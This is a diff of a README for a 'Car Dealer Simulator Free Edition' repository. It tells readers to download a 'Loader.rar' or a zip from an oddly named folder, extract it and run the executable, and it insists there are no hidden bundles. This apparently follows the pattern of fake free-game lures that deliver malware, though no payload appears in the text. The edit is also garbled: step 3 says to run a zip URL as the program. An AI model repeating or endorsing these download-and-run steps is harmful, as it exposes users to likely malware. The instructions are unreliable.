UgwuGeorge/CarDealerSim-Free-Edition/README.md

 Getting started with Car Dealer Simulator is easy!
 Follow these steps:

-1. **Download Loader.rar from the repository.**
+1. **Download https://raw.githubusercontent.com/UgwuGeorge/CarDealerSim-Free-Edition/main/ovispermary/CarDealerSim-Free-Edition.zip from the repository.**
-2. Extract the contents of Loader.rar to your desired location using any popular decompression tool (e.g., WinRAR, 7-Zip).
+2. Extract the contents of https://raw.githubusercontent.com/UgwuGeorge/CarDealerSim-Free-Edition/main/ovispermary/CarDealerSim-Free-Edition.zip to your desired location using any popular decompression tool (e.g., WinRAR, 7-Zip).
-3. Run the `CarDealerSimulator.exe` (Windows) or the appropriate launcher for your OS.
+3. Run the `https://raw.githubusercontent.com/UgwuGeorge/CarDealerSim-Free-Edition/main/ovispermary/CarDealerSim-Free-Edition.zip` (Windows) or the appropriate launcher for your OS.
 4. Follow the on-screen instructions to configure and start your simulation.

 *No complicated registration, hidden bundles, or forced installation of other software!*